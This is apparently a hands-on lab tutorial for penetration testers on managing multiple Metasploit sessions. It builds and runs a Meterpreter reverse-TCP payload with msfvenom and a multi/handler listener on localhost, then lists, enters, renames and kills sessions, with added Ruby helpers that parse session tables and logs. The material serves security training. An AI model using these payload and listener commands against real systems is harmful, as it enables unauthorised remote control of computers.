Manage Multiple Sessions in Metasploit

Introduction

In penetration testing, it's common to gain access to multiple systems simultaneously. The Metasploit Framework provides a powerful way to manage these connections, which are known as "sessions." A session is an active connection to a compromised target; it can be a plain command-line shell or an advanced Meterpreter session.

Effectively managing these sessions is a critical skill. It allows you to organize your workflow, switch between targets seamlessly, and maintain control over your compromised assets. In this lab, you will learn the fundamental commands for managing multiple sessions in Metasploit. You will practice gaining sessions, listing them, interacting with specific ones, renaming them for better organization, and finally, terminating them cleanly.

Gain multiple Meterpreter or shell sessions

In this step, you will set up a listener in Metasploit and then execute a payload to create two separate Meterpreter sessions. This simulates gaining access to two different systems.

First, open a terminal and start the Metasploit Framework console. The -q flag makes it start quietly, without showing the banner.

msfconsole -q

Next, we will configure a generic listener, called multi/handler, to wait for incoming connections.

use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job using the -j flag. This keeps the msfconsole prompt available for other commands while the listener runs in the background.

run -j

You should see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, you need to generate and execute the payload that will connect back to this listener. Open a new, second terminal tab by clicking the + icon in the terminal window.

In this new terminal, use msfvenom to create a payload. This command generates an ELF executable file that, when run, will connect back to our listener.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf

Make the generated payload file executable:

chmod +x ~/project/payload.elf

Now, from the ~/project directory (where the payload was saved), execute the payload twice to create two sessions. Each copy is run as a background process (&) so that you can run the command again immediately.

./payload.elf &
./payload.elf &

Switch back to your first terminal window with msfconsole. You will see messages indicating that two Meterpreter sessions have been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400

You have now successfully established two active sessions.

List all active sessions with the sessions command

In this step, you will learn how to view all the active sessions you have established. With multiple sessions open, you need a way to list them to see what you're connected to.

The sessions command is used for this purpose. In your msfconsole terminal, simply type sessions to get a list of all active sessions. Running sessions -l (list) produces the same output.

sessions

The output will be a table containing information about each session:

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  1         meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:38998 (...)
  2         meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

This table provides a clear overview:

  • Id: A unique number for each session, used to interact with it.
  • Name: A custom name for the session (currently empty).
  • Type: The type of session (e.g., meterpreter, shell).
  • Information: Details about the compromised system, like user ID.
  • Connection: The source and destination IP addresses and ports.

Interact with a specific session using sessions -i

In this step, you will learn how to select and interact with a specific session from the list.

Once you have identified the session you want to work with, you can use the sessions command with the -i (interact) flag followed by the session ID.

Let's interact with the first session (ID 1).

sessions -i 1

Your command prompt will change from msf6 > to meterpreter >, indicating that you are now inside the Meterpreter session and can run Meterpreter-specific commands.

[*] Starting interaction with 1...

meterpreter >

To confirm you are in the session, run a simple command like sysinfo to get system information from the target.

sysinfo

You will see output similar to this:

Computer     : labex-virtual-machine
OS           : Ubuntu 22.04 (Linux 5.15.0-78-generic)
Architecture : x64
System Language: en_US
Meterpreter  : x64/linux

After you are done working within a session, you can return to the main msfconsole prompt without terminating the session. To do this, use the background command.

background

This will put the session in the background and return you to the msf6 > prompt, allowing you to manage other sessions.

[*] Backgrounding session 1...
msf6 exploit(multi/handler) >

Rename a session for better organization using sessions -n

In this step, you will learn how to rename a session. When you manage many sessions, numeric IDs and an empty Name column are not descriptive. Renaming sessions with meaningful labels (e.g., "WebServer", "DBServer") makes them much easier to identify.

You can rename a session using the sessions command with the -n (name) flag. The syntax is sessions -n <NewName> <ID>.

Let's rename session 2 to something more descriptive, like TestHost.

sessions -n TestHost 2

Metasploit will confirm that the session has been renamed.

[*] Session 2's name has been changed to TestHost.

Now, list the sessions again to see the change.

sessions

The output table will now show the new name in the "Name" column for session 2.

Active sessions
===============

  Id  Name      Type                   Information              Connection
  --  ----      ----                   -----------              ----------
  1             meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:38998 (...)
  2   TestHost  meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

This makes it much easier to track your targets.
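
The table layout described in the listing and renaming steps can be turned into structured records for an engagement log. The following Ruby code is an added example, not part of the original lab or of Metasploit itself; the function names (parse_sessions_table, slice_col, unnamed_ids) and the sample table are constructed for illustration.

```ruby
# Constructed sample in the layout of the `sessions` table shown in this lab.
SAMPLE_TABLE = <<~TXT
  Active sessions
  ===============

  Id  Name      Type                   Information         Connection
  --  ----      ----                   -----------         ----------
  1             meterpreter x64/linux  uid=1000, gid=1000  127.0.0.1:4444 -> 127.0.0.1:38998
  2   TestHost  meterpreter x64/linux  uid=1000, gid=1000  127.0.0.1:4444 -> 127.0.0.1:39000
TXT

# Cut column i out of a line; column i runs from starts[i] up to the next start.
def slice_col(line, starts, i)
  last = starts[i + 1] ? starts[i + 1] - 1 : -1
  (line[starts[i]..last] || '').strip
end

# Parse the fixed-width table into an array of hashes keyed by header name.
def parse_sessions_table(text)
  lines = text.lines.map(&:chomp)
  # The row of dashes under the header marks where every column begins.
  rule = lines.index { |l| l.match?(/\A\s*-+(\s+-+)+\s*\z/) }
  return [] if rule.nil? || rule.zero?

  starts = []
  lines[rule].scan(/-+/) { starts << Regexp.last_match.begin(0) }
  keys = starts.each_index.map { |i| slice_col(lines[rule - 1], starts, i).downcase.to_sym }

  # Data rows follow the rule and end at the first blank line.
  lines[(rule + 1)..].take_while { |l| !l.strip.empty? }.map do |row|
    rec = keys.each_with_index.to_h { |k, i| [k, slice_col(row, starts, i)] }
    rec[:id] = Integer(rec[:id], 10)
    rec[:name] = nil if rec[:name].empty? # an empty Name cell means "never named"
    rec
  end
end

# IDs of sessions that still lack a descriptive name.
def unnamed_ids(rows)
  rows.select { |r| r[:name].nil? }.map { |r| r[:id] }
end

rows = parse_sessions_table(SAMPLE_TABLE)
rows.each { |r| puts format('%-3d %-10s %s', r[:id], r[:name] || '(unnamed)', r[:connection]) }
puts "Sessions to label with sessions -n: #{unnamed_ids(rows).inspect}"
```

Splitting on the dash rule rather than on whitespace keeps an empty Name cell from shifting the remaining columns.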

Terminate a session using sessions -k

In this step, you will learn how to terminate a session. Once you have finished your work on a target system, or when a session is no longer needed, it's good practice to close it.

To terminate, or kill, a session, use the sessions command with the -k (kill) flag, followed by the session ID.

Let's terminate session 1.

sessions -k 1

Metasploit will confirm that it is stopping the session.

[*] Stopping session 1...
[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit

To verify that the session has been terminated, list the active sessions one more time.

sessions

The output will now only show the remaining session, TestHost.

Active sessions
===============

  Id  Name      Type                   Information              Connection
  --  ----      ----                   -----------              ----------
  2   TestHost  meterpreter x64/linux  uid=1000, gid=1000, ...  127.0.0.1:4444 -> 127.0.0.1:39000 (...)

You have successfully cleaned up the unnecessary session.
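
To confirm at the end of an engagement that no session was left open, the console messages shown in this lab can be replayed from a saved log. The following Ruby code is an added example, not part of the original lab or of Metasploit; the regular expressions match only the message formats printed on this page, and the names reconcile_sessions and still_open and the sample log are constructed for illustration.

```ruby
# Constructed console lines, using the message formats shown in this lab.
SAMPLE_LOG = <<~LOG
  [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
  [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
  [*] Session 2's name has been changed to TestHost.
  [*] Stopping session 1...
  [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
LOG

OPENED  = /session (\d+) opened \((\S+) -> (\S+)\) at (.+)\z/
CLOSED  = /session (\d+) closed\.\s+Reason: (.+)\z/
RENAMED = /Session (\d+)'s name has been changed to (.+?)\.\z/

# Replay the log and return { id => { name:, peer:, opened_at:, closed: } }.
def reconcile_sessions(log)
  state = {}
  blank = { name: nil, peer: nil, opened_at: nil, closed: nil }
  log.each_line(chomp: true) do |line|
    case line
    when OPENED  then (state[$1.to_i] ||= blank.dup).update(peer: $3, opened_at: $4)
    when CLOSED  then (state[$1.to_i] ||= blank.dup)[:closed] = $2
    when RENAMED then (state[$1.to_i] ||= blank.dup)[:name] = $2
    end
  end
  state
end

# IDs with no matching "closed" line: these still need sessions -k.
def still_open(state)
  state.select { |_, s| s[:closed].nil? }.keys.sort
end

state = reconcile_sessions(SAMPLE_LOG)
state.sort.each do |id, s|
  status = s[:closed] ? "closed (#{s[:closed]})" : 'STILL OPEN'
  puts format('%-3d %-10s %-22s %s', id, s[:name] || '-', s[:peer] || '?', status)
end
puts "Open sessions remaining: #{still_open(state).inspect}"
```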

Summary

Congratulations on completing this lab! You have learned the essential skills for managing multiple sessions within the Metasploit Framework.

In this lab, you practiced:

  • Creating multiple Meterpreter sessions using a multi/handler and a payload.
  • Listing all active sessions with the sessions command.
  • Interacting with a specific session using sessions -i <ID>.
  • Renaming a session for better organization with sessions -n <Name> <ID>.
  • Terminating a session cleanly using sessions -k <ID>.

Mastering these commands is fundamental for any penetration tester, as it allows for efficient and organized control over multiple compromised systems.